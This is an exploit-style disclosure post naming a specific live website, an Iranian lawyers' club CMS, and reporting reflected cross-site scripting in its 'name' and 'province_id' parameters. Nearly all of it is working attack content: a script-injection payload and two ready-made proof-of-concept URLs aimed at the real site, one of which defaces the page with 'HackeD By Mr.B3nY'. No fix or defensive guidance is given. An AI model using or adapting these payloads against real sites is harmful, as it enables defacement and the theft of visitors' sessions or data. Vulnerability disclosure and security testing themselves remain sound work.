=========================================================
# Exploit Title: Iran Lawyers Club [ Bashgahvokala ] CMS - Cross-Site Scripting (XSS)
# Google Dork: -
# Date: 2021-11-19
# Exploit Author: Mr.B3nY
# Vendor Homepage: www.bashgahvokala.com
# Tested on: Parrot OS
# Vulnerability : Cross-Site Scripting (XSS)
=========================================================
[+] PAYLOAD :- " '</script><script>alert('PAYL0AD')</script><script> "
=========================================================
[+] POC :- https://bashgahvokala.com/results?name='</script><script>$('body').html("HackeD By Mr.B3nY")</script><script>&province_id=14&point=&ordering=all
[+] POC :- https://bashgahvokala.com/results?name='</script><script>alert('Mr.B3nY')</script><script>&province_id=14&point=&ordering=all
=========================================================
[ ! ! ! ] also "province_id" parameter is vulnerable
=========================================================